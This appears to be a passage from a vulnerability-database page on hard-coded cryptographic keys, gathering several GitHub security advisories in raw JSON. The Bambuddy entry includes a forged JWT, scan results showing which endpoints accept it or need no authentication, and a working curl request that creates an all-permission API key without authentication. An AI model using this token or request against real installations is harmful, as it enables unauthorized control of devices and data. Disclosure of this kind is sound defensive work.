eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJzcGVlbmFoIiwiZXhwIjo5OTk5OTk5OTk5fQ.xeUmpf4PkhI7jHHGBPLWQEQQ4GTiiUOENeQkPpvNMnA\n\n[*] Testing 117 endpoints against http://10.0.0.4:8000\n\n======================================================================\n\n[SYSTEM]\n /system/info: NO AUTH REQUIRED\n\n[AUTH]\n /auth/status: NO AUTH REQUIRED\n /auth/me: JWT WORKS\n\n[USERS]\n /users: JWT WORKS\n /users/1: JWT WORKS\n /users/1/items-count: JWT WORKS\n\n[GROUPS]\n /groups: JWT WORKS\n /groups/permissions: JWT WORKS\n /groups/1: JWT WORKS\n\n[SETTINGS]\n /settings: NO AUTH REQUIRED\n /settings/check-ffmpeg: NO AUTH REQUIRED\n /settings/spoolman: NO AUTH REQUIRED\n /settings/backup: NO AUTH REQUIRED\n /settings/virtual-printer/models: NO AUTH REQUIRED\n /settings/virtual-printer: NO AUTH REQUIRED\n /settings/mqtt/status: NO AUTH REQUIRED\n\n[PRINTERS]\n /printers/: JWT WORKS\n /printers/usb-cameras: JWT WORKS\n /printers/1: JWT WORKS\n /printers/1/status: JWT WORKS\n /printers/1/current-print-user: JWT WORKS\n /printers/1/cover: JWT WORKS\n /printers/1/files: JWT WORKS\n /printers/1/storage: JWT WORKS\n /printers/1/logging: JWT WORKS\n /printers/1/slot-presets: JWT WORKS\n /printers/1/slot-presets/1/1: JWT WORKS\n /printers/1/print/objects: JWT WORKS\n /printers/1/runtime-debug: JWT WORKS\n /printers/1/camera/status: NO AUTH REQUIRED\n /printers/1/camera/test: ERROR / ERROR\n /printers/1/camera/plate-detection/status: NO AUTH REQUIRED\n /printers/1/camera/plate-detection/references: NO AUTH REQUIRED\n /printers/1/kprofiles/: ERROR / ERROR\n /printers/1/kprofiles/notes: NO AUTH REQUIRED\n\n[ARCHIVES]\n /archives/: NO AUTH REQUIRED\n /archives/search: 422 / 422\n /archives/compare: 422 / 422\n /archives/analysis/failures: NO AUTH REQUIRED\n /archives/stats: NO AUTH REQUIRED\n /archives/tags: NO AUTH REQUIRED\n /archives/1: NO AUTH REQUIRED\n /archives/1/similar: NO AUTH REQUIRED\n /archives/1/duplicates: NO AUTH REQUIRED\n /archives/1/capabilities: NO AUTH REQUIRED\n /archives/1/gcode: NO AUTH REQUIRED\n /archives/1/plates: NO AUTH REQUIRED\n /archives/1/filament-requirements: NO AUTH REQUIRED\n /archives/1/project-page: NO AUTH REQUIRED\n /archives/1/source: 404 / 404\n\n[FILAMENTS]\n /filaments/: NO AUTH REQUIRED\n /filaments/1: NO AUTH REQUIRED\n /filaments/by-type/pla: NO AUTH REQUIRED\n\n[CLOUD]\n /cloud/status: NO AUTH REQUIRED\n /cloud/settings: 401 / 401\n /cloud/settings/1: 401 / 401\n /cloud/devices: 401 / 401\n /cloud/firmware-updates: 401 / 401\n /cloud/fields: NO AUTH REQUIRED\n /cloud/fields/print: NO AUTH REQUIRED\n\n[QUEUE]\n /queue/: NO AUTH REQUIRED\n /queue/1: 404 / 404\n\n[NOTIFICATIONS]\n /notifications/: NO AUTH REQUIRED\n /notifications/logs: NO AUTH REQUIRED\n /notifications/logs/stats: NO AUTH REQUIRED\n /notifications/1: 404 / 404\n\n[NOTIFICATION_TEMPLATES]\n /notification-templates: NO AUTH REQUIRED\n /notification-templates/variables: NO AUTH REQUIRED\n /notification-templates/1: NO AUTH REQUIRED\n\n[UPDATES]\n /updates/version: NO AUTH REQUIRED\n /updates/check: NO AUTH REQUIRED\n /updates/status: NO AUTH REQUIRED\n\n[MAINTENANCE]\n /maintenance/types: NO AUTH REQUIRED\n /maintenance/overview: NO AUTH REQUIRED\n /maintenance/summary: NO AUTH REQUIRED\n /maintenance/printers/1: NO AUTH REQUIRED\n /maintenance/items/1/history: NO AUTH REQUIRED\n\n[EXTERNAL_LINKS]\n /external-links/: NO AUTH REQUIRED\n /external-links/1: 404 / 404\n\n[PROJECTS]\n /projects: NO AUTH REQUIRED\n /projects/templates: NO AUTH REQUIRED\n /projects/1: NO AUTH REQUIRED\n /projects/1/archives: NO AUTH REQUIRED\n /projects/1/queue: NO AUTH REQUIRED\n /projects/1/bom: NO AUTH REQUIRED\n /projects/1/timeline: NO AUTH REQUIRED\n\n[LIBRARY]\n /library/folders: NO AUTH REQUIRED\n /library/folders/by-archive/1: NO AUTH REQUIRED\n /library/folders/by-project/1: NO AUTH REQUIRED\n /library/files: NO AUTH REQUIRED\n /library/stats: NO AUTH REQUIRED\n /library/folders/1: NO AUTH REQUIRED\n /library/files/1: 404 / 404\n /library/files/1/plates: 404 / 404\n /library/files/1/gcode: 404 / 404\n /library/files/1/filament-requirements: 404 / 404\n\n[API_KEYS]\n /api-keys/: NO AUTH REQUIRED\n /api-keys/1: NO AUTH REQUIRED\n\n[WEBHOOK]\n /webhook/printer/1/status: 401 / 401\n /webhook/queue: 401 / 401\n\n[AMS_HISTORY]\n /ams-history/1/1: NO AUTH REQUIRED\n\n[SUPPORT]\n /support/debug-logging: NO AUTH REQUIRED\n /support/logs: NO AUTH REQUIRED\n\n[DISCOVERY]\n /discovery/info: NO AUTH REQUIRED\n /discovery/status: NO AUTH REQUIRED\n /discovery/printers: NO AUTH REQUIRED\n /discovery/scan/status: NO AUTH REQUIRED\n\n[PENDING_UPLOADS]\n /pending-uploads/: NO AUTH REQUIRED\n /pending-uploads/count: NO AUTH REQUIRED\n /pending-uploads/1: 404 / 404\n\n[FIRMWARE]\n /firmware/updates: NO AUTH REQUIRED\n /firmware/updates/1: NO AUTH REQUIRED\n /firmware/latest: NO AUTH REQUIRED\n\n[GITHUB_BACKUP]\n /github-backup/config: NO AUTH REQUIRED\n /github-backup/status: NO AUTH REQUIRED\n /github-backup/logs: NO AUTH REQUIRED\n\n[METRICS]\n /metrics: 401 / 401\n\n======================================================================\n\n[SUMMARY]\n\nEndpoints accessible WITHOUT authentication (77):\n - /system/info\n - /auth/status\n - /settings\n - /settings/check-ffmpeg\n - /settings/spoolman\n - /settings/backup\n - /settings/virtual-printer/models\n - /settings/virtual-printer\n - /settings/mqtt/status\n - /printers/1/camera/status\n - /printers/1/camera/plate-detection/status\n - /printers/1/camera/plate-detection/references\n - /printers/1/kprofiles/notes\n - /archives/\n - /archives/analysis/failures\n - /archives/stats\n - /archives/tags\n - /archives/1\n - /archives/1/similar\n - /archives/1/duplicates\n - /archives/1/capabilities\n - /archives/1/gcode\n - /archives/1/plates\n - /archives/1/filament-requirements\n - /archives/1/project-page\n - /filaments/\n - /filaments/1\n - /filaments/by-type/pla\n - /cloud/status\n - /cloud/fields\n - /cloud/fields/print\n - /queue/\n - /notifications/\n - /notifications/logs\n - /notifications/logs/stats\n - /notification-templates\n - /notification-templates/variables\n - /notification-templates/1\n - /updates/version\n - /updates/check\n - /updates/status\n - /maintenance/types\n - /maintenance/overview\n - /maintenance/summary\n - /maintenance/printers/1\n - /maintenance/items/1/history\n - /external-links/\n - /projects\n - /projects/templates\n - /projects/1\n - /projects/1/archives\n - /projects/1/queue\n - /projects/1/bom\n - /projects/1/timeline\n - /library/folders\n - /library/folders/by-archive/1\n - /library/folders/by-project/1\n - /library/files\n - /library/stats\n - /library/folders/1\n - /api-keys/\n - /api-keys/1\n - /ams-history/1/1\n - /support/debug-logging\n - /support/logs\n - /discovery/info\n - /discovery/status\n - /discovery/printers\n - /discovery/scan/status\n - /pending-uploads/\n - /pending-uploads/count\n - /firmware/updates\n - /firmware/updates/1\n - /firmware/latest\n - /github-backup/config\n - /github-backup/status\n - /github-backup/logs\n\nEndpoints accessible with FORGED JWT only (20):\n - /auth/me\n - /users\n - /users/1\n - /users/1/items-count\n - /groups\n - /groups/permissions\n - /groups/1\n - /printers/\n - /printers/usb-cameras\n - /printers/1\n - /printers/1/status\n - /printers/1/current-print-user\n - /printers/1/cover\n - /printers/1/files\n - /printers/1/storage\n - /printers/1/logging\n - /printers/1/slot-presets\n - /printers/1/slot-presets/1/1\n - /printers/1/print/objects\n - /printers/1/runtime-debug\n\nEndpoints that rejected both (20):\n - /printers/1/camera/test (no_auth: ERROR, jwt: ERROR)\n - /printers/1/kprofiles/ (no_auth: ERROR, jwt: ERROR)\n - /archives/search (no_auth: 422, jwt: 422)\n - /archives/compare (no_auth: 422, jwt: 422)\n - /archives/1/source (no_auth: 404, jwt: 404)\n - /cloud/settings (no_auth: 401, jwt: 401)\n - /cloud/settings/1 (no_auth: 401, jwt: 401)\n - /cloud/devices (no_auth: 401, jwt: 401)\n - /cloud/firmware-updates (no_auth: 401, jwt: 401)\n - /queue/1 (no_auth: 404, jwt: 404)\n - /notifications/1 (no_auth: 404, jwt: 404)\n - /external-links/1 (no_auth: 404, jwt: 404)\n - /library/files/1 (no_auth: 404, jwt: 404)\n - /library/files/1/plates (no_auth: 404, jwt: 404)\n - /library/files/1/gcode (no_auth: 404, jwt: 404)\n - /library/files/1/filament-requirements (no_auth: 404, jwt: 404)\n - /webhook/printer/1/status (no_auth: 401, jwt: 401)\n - /webhook/queue (no_auth: 401, jwt: 401)\n - /pending-uploads/1 (no_auth: 404, jwt: 404)\n - /metrics (no_auth: 401, jwt: 401)\n```\n\n\u003c/details\u003e\n\nWhile this script only tests the GET endpoints, these vulnerabilities are not exclusive to GET endpoints. The GET endpoints were easiest to script since they generally don\u0027t require many parameters, but other methods still appear vulnerable. I manually tested `POST /api/v1/api-keys/` and was able to create a new API key with all permissions without auth:\n```bash\ncurl \u0027http://10.0.0.4:8000/api/v1/api-keys/\u0027 -X POST -H \u0027Content-Type: application/json\u0027 --data-raw \u0027{\"name\":\"new key\",\"can_queue\":true,\"can_control_printer\":true,\"can_read_status\":true}\u0027\n```\nyields\n```json\n{\"id\":7,\"name\":\"new key\",\"key_prefix\":\"bb_QW2su...\",\"can_queue\":true,\"can_control_printer\":true,\"can_read_status\":true,\"printer_ids\":null,\"enabled\":true,\"last_used\":null,\"created_at\":\"2026-02-01T23:14:15\",\"expires_at\":null,\"key\":\"bb_QW2suZVIHiUbadSyyAMrnmf0zFhDG5e9BSVBvb4ZN-w\"}\n```\n\n### Impact\nBamBuddy is vulnerable to unauthorized access and control",
"id": "GHSA-gc24-px2r-5qmf",
"modified": "2026-02-06T21:38:03Z",
"published": "2026-02-02T21:21:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/maziggy/bambuddy/security/advisories/GHSA-gc24-px2r-5qmf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25505"
},
{
"type": "WEB",
"url": "https://github.com/maziggy/bambuddy/pull/225"
},
{
"type": "WEB",
"url": "https://github.com/maziggy/bambuddy/commit/a82f9278d2d587b7042a0858aab79fd8b6e3add9"
},
{
"type": "WEB",
"url": "https://github.com/maziggy/bambuddy/commit/c31f2968889c855f1ffacb700c2c9970deb2a6fb"
},
{
"type": "PACKAGE",
"url": "https://github.com/maziggy/bambuddy"
},
{
"type": "WEB",
"url": "https://github.com/maziggy/bambuddy/blob/a9bb8ed8239602bf08a9914f85a09eeb2bf13d15/backend/app/core/auth.py#L28"
},
{
"type": "WEB",
"url": "https://github.com/maziggy/bambuddy/blob/main/CHANGELOG.md"
},
{
"type": "WEB",
"url": "https://github.com/maziggy/bambuddy/releases/tag/v0.1.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Bambuddy Uses Hardcoded Secret Key + Many API Endpoints do not Require Authentication"
}
GHSA-GFMQ-99P2-3JWP
Vulnerability from github – Published: 2024-05-14 18:30 – Updated: 2024-05-14 18:30A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). The affected systems use symmetric cryptography with a hard-coded key to protect the communication between client and server. This could allow an unauthenticated remote attacker to compromise confidentiality and integrity of the communication and, subsequently, availability of the system. A successful exploit requires the attacker to gain knowledge of the hard-coded key and to be able to intercept the communication between client and server on the network.
{
"affected": [],
"aliases": [
"CVE-2024-30207"
],
"database_specific": {
"cwe_ids": [
"CWE-321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T16:16:47Z",
"severity": "CRITICAL"
},
"details": "A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions \u003c V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions \u003c V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions \u003c V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions \u003c V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions \u003c V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions \u003c V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions \u003c V3.0.1.1). The affected systems use symmetric cryptography with a hard-coded key to protect the communication between client and server. This could allow an unauthenticated remote attacker to compromise confidentiality and integrity of the communication and, subsequently, availability of the system.\nA successful exploit requires the attacker to gain knowledge of the hard-coded key and to be able to intercept the communication between client and server on the network.",
"id": "GHSA-gfmq-99p2-3jwp",
"modified": "2024-05-14T18:30:59Z",
"published": "2024-05-14T18:30:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30207"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-093430.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GG86-H3JM-9M46
Vulnerability from github – Published: 2026-06-05 12:31 – Updated: 2026-06-05 15:32The linqi application contains hardcoded cryptographic keys. Additionally, the application uses a weak algorithm with a limited ASCII charset to dynamically generate Initialization Vectors (IVs) for AES/CBC encryption, making known-plaintext attacks feasible. An attacker with local access can leverage these vulnerabilities to decrypt sensitive obfuscated strings, including ConnectionString values containing database credentials from appsettings.json.
{
"affected": [],
"aliases": [
"CVE-2026-11347"
],
"database_specific": {
"cwe_ids": [
"CWE-321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-05T11:16:34Z",
"severity": "HIGH"
},
"details": "The linqi application contains hardcoded cryptographic keys. Additionally, the application uses a weak algorithm with a limited ASCII charset to dynamically generate Initialization Vectors (IVs) for AES/CBC encryption, making known-plaintext attacks feasible. An attacker with local access can leverage these vulnerabilities to decrypt sensitive obfuscated strings, including ConnectionString values containing database credentials from appsettings.json.",
"id": "GHSA-gg86-h3jm-9m46",
"modified": "2026-06-05T15:32:20Z",
"published": "2026-06-05T12:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11347"
},
{
"type": "WEB",
"url": "https://linqi.help/en/reference/security/security-advisories/#security-advisory-hardcoded-cryptographic-keys-and-weak-iv-generation-in-linqi"
},
{
"type": "WEB",
"url": "https://linqi.help/en/reference/security/security-advisories/#security-advisory-hardcoded-cryptographic-keys-and-weak-iv-generation-in-the-linqi-application"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-GPG3-V7VJ-4V8W
Vulnerability from github – Published: 2024-03-13 03:31 – Updated: 2024-03-13 03:31Intumit SmartRobot uses a fixed encryption key for authentication. Remote attackers can use this key to encrypt a string composed of the user's name and timestamp to generate an authentication code. With this authentication code, they can obtain administrator privileges and subsequently execute arbitrary code on the remote server using built-in system functionality.
{
"affected": [],
"aliases": [
"CVE-2024-2413"
],
"database_specific": {
"cwe_ids": [
"CWE-321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-13T03:15:06Z",
"severity": "CRITICAL"
},
"details": "Intumit SmartRobot uses a fixed encryption key for authentication. Remote attackers can use this key to encrypt a string composed of the user\u0027s name and timestamp to generate an authentication code. With this authentication code, they can obtain administrator privileges and subsequently execute arbitrary code on the remote server using built-in system functionality.",
"id": "GHSA-gpg3-v7vj-4v8w",
"modified": "2024-03-13T03:31:06Z",
"published": "2024-03-13T03:31:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2413"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-7697-ecf10-1.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GRQV-C4P4-JP68
Vulnerability from github – Published: 2025-09-16 15:32 – Updated: 2025-09-16 15:32Out-of-support Control-M/Agent versions 9.0.18 to 9.0.20 (and potentially earlier unsupported versions) that are configured to use the non-default Blowfish cryptography algorithm use a hardcoded key. An attacker with access to network traffic and to this key could decrypt network traffic between the Control-M/Agent and Server.
{
"affected": [],
"aliases": [
"CVE-2025-55112"
],
"database_specific": {
"cwe_ids": [
"CWE-321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-16T13:16:06Z",
"severity": "HIGH"
},
"details": "Out-of-support Control-M/Agent versions 9.0.18 to 9.0.20 (and potentially earlier unsupported versions) that are configured to use the non-default Blowfish cryptography algorithm use a hardcoded key. An attacker with access to network traffic and to this key could decrypt network traffic between the Control-M/Agent and Server.",
"id": "GHSA-grqv-c4p4-jp68",
"modified": "2025-09-16T15:32:36Z",
"published": "2025-09-16T15:32:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55112"
},
{
"type": "WEB",
"url": "https://bmcapps.my.site.com/casemgmt/sc_KnowledgeArticle?sfdcid=000441966"
},
{
"type": "WEB",
"url": "https://bmcapps.my.site.com/casemgmt/sc_KnowledgeArticle?sfdcid=000442099"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-H38H-R53H-RJQG
Vulnerability from github – Published: 2024-05-03 03:30 – Updated: 2024-05-03 03:30D-Link D-View Use of Hard-coded Cryptographic Key Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of D-Link D-View. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the TokenUtils class. The issue results from a hard-coded cryptographic key. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19659.
{
"affected": [],
"aliases": [
"CVE-2023-32169"
],
"database_specific": {
"cwe_ids": [
"CWE-321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-03T02:15:22Z",
"severity": "CRITICAL"
},
"details": "D-Link D-View Use of Hard-coded Cryptographic Key Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of D-Link D-View. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the TokenUtils class. The issue results from a hard-coded cryptographic key. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19659.",
"id": "GHSA-h38h-r53h-rjqg",
"modified": "2024-05-03T03:30:51Z",
"published": "2024-05-03T03:30:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32169"
},
{
"type": "WEB",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10332"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-714"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H773-7GF7-9M2X
Vulnerability from github – Published: 2025-10-21 20:26 – Updated: 2025-10-30 17:58Impact
NeuVector used a hard-coded cryptographic key embedded in the source code. At compilation time, the key value was replaced with the secret key value and used to encrypt sensitive configurations when NeuVector stores the data.
In the patched version, NeuVector leverages the Kubernetes secret neuvector-store-secret in neuvector namespace to dynamically generate cryptographically secure random keys. This approach removes the reliance on static key values and ensures that encryption keys are managed securely within Kubernetes.
During rolling upgrade or restoring from persistent storage, the NeuVector controller checks each encrypted configured field. If a sensitive field in the configuration is found to be encrypted by the default encryption key, it’s decrypted with the default encryption key and then re-encrypted with the new dynamic encryption key.
If the NeuVector controller does not have the correct RBAC for accessing the new secret, it writes this error log :
Required Kubernetes RBAC for secrets are not found and exits.
The device encryption key is rotated every 3 months. For details, please refer to this Rotating Self-Signed Certificate documentation.
Patches
Patched versions include release v5.4.7 and above.
Workarounds
There is no workaround for this issue. Users are recommended to upgrade, as soon as possible, to a version of NeuVector that contains the fix.
References
If you have any questions or comments about this advisory: - Reach out to the SUSE Rancher Security team for security related inquiries. - Open an issue in the NeuVector repository. - Verify with our support matrix and product support lifecycle.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.4.6"
},
"package": {
"ecosystem": "Go",
"name": "github.com/neuvector/neuvector"
},
"ranges": [
{
"events": [
{
"introduced": "5.3.0"
},
{
"fixed": "5.4.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/neuvector/neuvector"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0-20230727023453-1c4957d53911"
},
{
"fixed": "0.0.0-20251020133207-084a437033b4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-54471"
],
"database_specific": {
"cwe_ids": [
"CWE-321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-21T20:26:25Z",
"nvd_published_at": "2025-10-30T10:15:35Z",
"severity": "MODERATE"
},
"details": "### Impact\nNeuVector used a hard-coded cryptographic key embedded in the source code. At compilation time, the key value was replaced with the secret key value and used to encrypt sensitive configurations when NeuVector stores the data.\n\nIn the patched version, NeuVector leverages the Kubernetes secret `neuvector-store-secret` in `neuvector` namespace to dynamically generate cryptographically secure random keys. This approach removes the reliance on static key values and ensures that encryption keys are managed securely within Kubernetes.\n\nDuring rolling upgrade or restoring from persistent storage, the NeuVector controller checks each encrypted configured field. If a sensitive field in the configuration is found to be encrypted by the default encryption key, it\u2019s decrypted with the default encryption key and then re-encrypted with the new dynamic encryption key.\n\nIf the NeuVector controller does not have the correct RBAC for accessing the new secret, it writes this error log : \n`Required Kubernetes RBAC for secrets are not found` and exits.\n\nThe device encryption key is rotated every 3 months. For details, please refer to this [Rotating Self-Signed Certificate](https://open-docs.neuvector.com/configuration/console/certrotate) documentation.\n\n### Patches\nPatched versions include release **v5.4.7** and above.\n\n### Workarounds\nThere is no workaround for this issue. Users are recommended to upgrade, as soon as possible, to a version of NeuVector that contains the fix.\n\n### References\nIf you have any questions or comments about this advisory:\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n- Open an issue in the [NeuVector](https://github.com/neuvector/neuvector/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-neuvector/support-matrix/all-supported-versions/neuvector-v-all-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/#suse-security).",
"id": "GHSA-h773-7gf7-9m2x",
"modified": "2025-10-30T17:58:58Z",
"published": "2025-10-21T20:26:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/neuvector/neuvector/security/advisories/GHSA-h773-7gf7-9m2x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54471"
},
{
"type": "WEB",
"url": "https://github.com/neuvector/neuvector/commit/084a437033b491eeea11bdba1a09dd84ed12ea88"
},
{
"type": "WEB",
"url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-54471"
},
{
"type": "PACKAGE",
"url": "https://github.com/neuvector/neuvector"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "NeuVector is shipping cryptographic material into its binary"
}
GHSA-H7M9-MJXP-HHHV
Vulnerability from github – Published: 2023-10-25 18:32 – Updated: 2023-11-01 15:33EisBaer Scada - CWE-321: Use of Hard-coded Cryptographic Key
{
"affected": [],
"aliases": [
"CVE-2023-42492"
],
"database_specific": {
"cwe_ids": [
"CWE-321",
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-25T18:17:31Z",
"severity": "CRITICAL"
},
"details": " EisBaer Scada - CWE-321: Use of Hard-coded Cryptographic Key",
"id": "GHSA-h7m9-mjxp-hhhv",
"modified": "2023-11-01T15:33:29Z",
"published": "2023-10-25T18:32:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42492"
},
{
"type": "WEB",
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Prevention schemes mirror that of hard-coded password storage.
No CAPEC attack patterns related to this CWE.